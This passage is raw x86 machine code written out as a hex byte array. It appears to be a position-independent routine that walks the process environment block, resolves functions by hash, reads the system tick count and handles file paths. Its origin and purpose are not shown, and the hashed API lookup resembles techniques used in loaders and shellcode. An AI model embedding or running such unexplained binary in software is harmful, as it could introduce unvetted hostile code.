0xE8,0xE8,0x58,0x00,0x00,0x89,0x45,0xE8,0x81,0x7D,0xE8,0x02,0x01,0x00,0x00,0x74,0x1F,0x83,0x7D,0xE8,0x00,0x78,0x19,0x81,0x7D,0xE8,0xC0,0x00,0x00,0x00,0x74,0xCA,0x81,0x7D,0xE8,0x01,0x01,0x00,0x00,0x74,0xC1,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xE8,0x75,0x06,0x00,0x00,0x89,0x45,0xEC,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x22,0x90,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xDC,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xDC,0x89,0x04,0x24,0xE8,0xCB,0x56,0x00,0x00,0x8B,0x45,0xCC,0x85,0xC0,0x74,0x16,0x8B,0x45,0xCC,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x23,0x5D,0x00,0x00,0x89,0x45,0xE8,0x8B,0x45,0xD0,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xD0,0x89,0x04,0x24,0xE8,0x9C,0x56,0x00,0x00,0x8B,0x45,0xD4,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xD4,0x89,0x04,0x24,0xE8,0x8A,0x56,0x00,0x00,0x8B,0x45,0xD8,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xD8,0x89,0x04,0x24,0xE8,0x78,0x56,0x00,0x00,0x8B,0x45,0x98,0x85,0xC0,0x74,0x16,0x8B,0x45,0x98,0x89,0x04,0x24,0xE8,0xAF,0xF3,0xFF,0xFF,0x8B,0x45,0x98,0x89,0x04,0x24,0xE8,0x5B,0x56,0x00,0x00,0x83,0x7D,0xF0,0x00,0x74,0x4B,0x83,0x7D,0xF0,0x00,0x74,0x45,0xC7,0x44,0x24,0x08,0x68,0x05,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x21,0x92,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x7D,0xFC,0xC9,0xC3,0x90,0x90,0x90,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xA1,0x24,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8D,0x45,0x0C,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xA1,0x90,0xD0,0x48,0x65,0xFF,0xD0,0x83,0xC0,0x02,0x89,0x45,0xF4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xB2,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x44,0x24,0x0C,0x8B,0x45,0x08,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xA1,0x94,0xD0,0x48,0x65,0xFF,0xD0,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x71,0x91,0x00,0x00,0x89,0xC3,0xC7,0x04,0x24,0xF5,0xFF,0xFF,0xFF,0xA1,0x48,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x89,0x5C,0x24,0x08,0x8B,0x55,0xF0,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xA1,0x78,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x14,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xF4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xEE,0x90,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x90,0x8B,0x5D,0xFC,0xC9,0xC3,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x28,0xE8,0x5A,0x54,0x00,0x00,0x89,0x45,0xF0,0xC7,0x45,0xE0,0x30,0x00,0x00,0x00,0x8B,0x45,0xE0,0x64,0x8B,0x00,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x8B,0x40,0x0C,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x83,0xC0,0x0C,0x89,0x45,0xE4,0x8B,0x45,0xE8,0x8B,0x40,0x0C,0x89,0x45,0xF4,0xEB,0x44,0x8B,0x45,0xF4,0x8B,0x40,0x18,0x89,0xC2,0x8B,0x45,0xF0,0x39,0xD0,0x72,0x29,0x8B,0x45,0xF4,0x8B,0x40,0x18,0x89,0xC2,0x8B,0x45,0xF4,0x8B,0x40,0x20,0x01,0xD0,0x8B,0x55,0xF0,0x39,0xC2,0x73,0x15,0x8B,0x45,0xF4,0x8B,0x50,0x30,0x8B,0x45,0x08,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x19,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x3B,0x45,0xE4,0x75,0xB4,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x78,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xB4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0xC7,0x45,0xA4,0x00,0x00,0x00,0x00,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xAC,0x00,0x00,0x00,0x00,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xCC,0xE2,0x48,0x65,0xE8,0xD3,0x1C,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x20,0x0E,0xAE,0x06,0x89,0x04,0x24,0xE8,0x42,0x1B,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x49,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xCC,0xE2,0x48,0x65,0xE8,0x9A,0x1C,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x1D,0x21,0x88,0x03,0x89,0x04,0x24,0xE8,0x09,0x1B,0x00,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x84,0x13,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xCC,0xE2,0x48,0x65,0xE8,0x61,0x1C,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x56,0x43,0xDD,0x7B,0x89,0x04,0x24,0xE8,0xD0,0x1A,0x00,0x00,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x0F,0x84,0xDD,0x01,0x00,0x00,0x8D,0x45,0xD8,0x89,0x04,0x24,0xE8,0x3D,0xFE,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0xC8,0x01,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x0A,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x9A,0x01,0x00,0x00,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0xE6,0xE2,0x48,0x65,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x00,0x8F,0x00,0x00,0x8B,0x45,0xD8,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xDE,0x8E,0x00,0x00,0x8B,0x45,0xF0,0x89,0x45,0xD0,0x8B,0x45,0xD0,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x89,0x04,0x24,0xE8,0xAD,0x89,0x00,0x00,0x66,0x89,0x45,0xCC,0x0F,0xB7,0x45,0xCC,0x01,0xC0,0x66,0x89,0x45,0xCC,0x0F,0xB7,0x45,0xCC,0x83,0xC0,0x02,0x66,0x89,0x45,0xCE,0xC7,0x45,0xB4,0x18,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x40,0x00,0x00,0x00,0x8D,0x45,0xCC,0x89,0x45,0xBC,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8D,0x45,0xB4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x04,0x00,0x8D,0x45,0xD4,0x89,0x04,0x24,0xE8,0xFA,0x54,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x88,0xE6,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x8D,0x45,0xA0,0x89,0x04,0x24,0x8B,0x45,0xE4,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0xC6,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x8D,0x45,0xA0,0x89,0x04,0x24,0x8B,0x45,0xE0,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x96,0x00,0x00,0x00,0x8B,0x45,0xD4,0x8D,0x55,0xA0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x04,0x00,0x00,0x00,0x89,0x04,0x24,0x8B,0x45,0xE8,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x73,0x8B,0x45,0xD4,0x89,0x04,0x24,0xE8,0x90,0x51,0x00,0x00,0x89,0x45,0xEC,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x78,0x5B,0x8D,0x45,0xB4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x01,0x00,0x8D,0x45,0xD4,0x89,0x04,0x24,0xE8,0x3C,0x54,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x3B,0x8B,0x45,0xD4,0x89,0x04,0x24,0xE8,0xEE,0x54,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x2A,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x22,0x90,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xD4,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xD4,0x89,0x04,0x24,0xE8,0x0C,0x51,0x00,0x00,0x83,0x7D,0xF0,0x00,0x74,0x54,0x83,0x7D,0xF0,0x00,0x74,0x4E,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x32,0x8D,0x00,0x00,0x01,0xC0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xC9,0x8C,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0xC9,0xC3,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x18,0x8B,0x45,0x08,0x89,0x04,0x24,0xA1,0xE8,0x61,0x49,0x65,0xFF,0xD0,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x2C,0x01,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x4B,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x00,0xE3,0x48,0x65,0xE8,0x8A,0x00,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x74,0x2B,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x1C,0xE3,0x48,0x65,0xE8,0x13,0xFA,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0x07,0xFA,0xFF,0xFF,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xEC,0x00,0x74,0x4A,0x83,0x7D,0xEC,0x00,0x74,0x44,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xC0,0x8B,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x3E,0xE3,0x48,0x65,0xE8,0xA1,0x18,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x0B,0x60,0x9C,0x2F,0x89,0x04,0x24,0xE8,0x10,0x17,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x2E,0x8B,0x45,0x10,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xF0,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0x10,0x83,0x7D,0x10,0x00,0x74,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x14,0xC7,0x45,0xE4,0x30,0x00,0x00,0x00,0x8B,0x45,0xE4,0x64,0x8B,0x00,0x89,0x45,0xE0,0x8B,0x45,0xE0,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x05,0xA4,0x00,0x00,0x00,0x8B,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x05,0x76,0x32,0xB8,0x20,0x03,0xFE,0x7F,0x8B,0x50,0x04,0x8B,0x00,0xB9,0x04,0x00,0xFE,0x7F,0x8B,0x09,0xBB,0x00,0x00,0x00,0x00,0x89,0xD7,0x0F,0xAF,0xF9,0x89,0xDE,0x0F,0xAF,0xF0,0x01,0xFE,0xF7,0xE1,0x8D,0x0C,0x16,0x89,0xCA,0x0F,0xAC,0xD0,0x18,0xC1,0xEA,0x18,0xEB,0x34,0xB8,0x00,0x00,0xFE,0x7F,0x8B,0x00,0x89,0xC1,0xBB,0x00,0x00,0x00,0x00,0xB8,0x04,0x00,0xFE,0x7F,0x8B,0x00,0xBA,0x00,0x00,0x00,0x00,0x89,0xDF,0x0F,0xAF,0xF8,0x89,0xD6,0x0F,0xAF,0xF1,0x01,0xFE,0xF7,0xE1,0x8D,0x0C,0x16,0x89,0xCA,0x0F,0xAC,0xD0,0x18,0xC1,0xEA,0x18,0x83,0xC4,0x14,0x5B,0x5E,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x57,0x53,0x81,0xEC,0x40,0x02,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x8D,0x95,0xD8,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0xC7,0x00,0x00,0x00,0x00,0x00,0x83,0x7D,0x08,0x00,0x0F,0x84,0x0D,0x02,0x00,0x00,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xD8,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xE0,0x89,0x00,0x00,0x8B,0x45,0xE8,0x8D,0x55,0xE8,0x89,0x54,0x24,0x10,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x04,0x00,0x00,0x89,0x04,0x24,0xE8,0x9F,0x4D,0x00,0x00,0x89,0x45,0xF0,0x81,0x7D,0xF0,0x1A,0x00,0x00,0x80,0x75,0x24,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x58,0xE3,0x48,0x65,0xE8,0xC3,0xF7,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0xB7,0xF7,0xFF,0xFF,0xE9,0x9D,0x01,0x00,0x00,0x83,0x7D,0xF0,0x00,0x0F,0x88,0x8F,0x01,0x00,0x00,0x8B,0x45,0xE8,0x8D,0x55,0xE0,0x89,0x54,0x24,0x08,0x8D,0x55,0xE4,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x80,0x0E,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0x51,0x01,0x00,0x00,0x8B,0x45,0xE4,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x75,0x54,0x8B,0x45,0xE4,0x85,0xC0,0x0F,0x84,0x41,0x01,0x00,0x00,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x3E,0x89,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0xF8,0x00,0x00,0x00,0x8B,0x45,0xE4,0x8B,0x40,0x04,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x61,0x89,0x00,0x00,0x83,0xC0,0x02,0x89,0x45,0xEC,0x8D,0x85,0xD8,0xFD,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x67,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x44,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xB7,0x88,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0x80,0x0E,0x00,0x00,0x8B,0x55,0x0C,0x89,0x02,0x90,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x71,0xEB,0x60,0x8B,0x45,0xE4,0x85,0xC0,0x0F,0x84,0x6E,0xFE,0xFF,0xFF,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x4C,0x88,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0x25,0xFE,0xFF,0xFF,0x90,0xE9,0x1F,0xFE,0xFF,0xFF,0x90,0xE9,0x19,0xFE,0xFF,0xFF,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xE8,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0x02,0x4C,0x00,0x00,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x4B,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x44,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xC7,0x87,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8D,0x65,0xF8,0x5B,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0x8B,0x45,0x08,0x0F,0xB6,0x10,0x8B,0x45,0x08,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x38,0xC2,0x75,0x14,0x8B,0x45,0x08,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x3C,0x5C,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x56,0x8B,0x45,0x08,0x0F,0xB6,0x00,0x83,0xC8,0x20,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x60,0x7E,0x06,0x80,0x7D,0xFF,0x7A,0x7E,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x37,0x8B,0x45,0x08,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x3A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1E,0x8B,0x45,0x08,0x83,0xC0,0x02,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x5C,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x81,0xEC,0x28,0x02,0x00,0x00,0x8B,0x45,0x08,0x8B,0x40,0x04,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0x78,0xE3,0x48,0x65,0x89,0x04,0x24,0xE8,0x47,0x87,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0x49,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x1F,0xE8,0x97,0x00,0x00,0x00,0x8B,0x55,0x08,0x8B,0x52,0x04,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x89,0x44,0x24,0x04,0x89,0x14,0x24,0xE8,0x11,0x87,0x00,0x00,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8D,0x85,0xF0,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x84,0x86,0x00,0x00,0x8B,0x45,0x08,0x8B,0x40,0x04,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8D,0x95,0xF0,0xFD,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xD4,0x86,0x00,0x00,0x8B,0x45,0x08,0x8B,0x40,0x04,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x89,0x04,0x24,0xE8,0xA6,0x81,0x00,0x00,0x89,0xC2,0x8B,0x45,0x08,0x66,0x89,0x10,0x8B,0x45,0x08,0x0F,0xB7,0x00,0x8D,0x14,0x00,0x8B,0x45,0x08,0x66,0x89,0x10,0x8B,0x45,0x08,0x0F,0xB7,0x00,0x8D,0x50,0x02,0x8B,0x45,0x08,0x66,0x89,0x50,0x02,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xF4,0x30,0x00,0x00,0x00,0x8B,0x45,0xF4,0x64,0x8B,0x00,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x83,0xC0,0x10,0x8B,0x00,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x40,0x28,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x68,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0xBA,0x00,0x00,0x00,0x00,0x89,0x45,0xC8,0x89,0x55,0xCC,0xC7,0x45,0xD8,0x18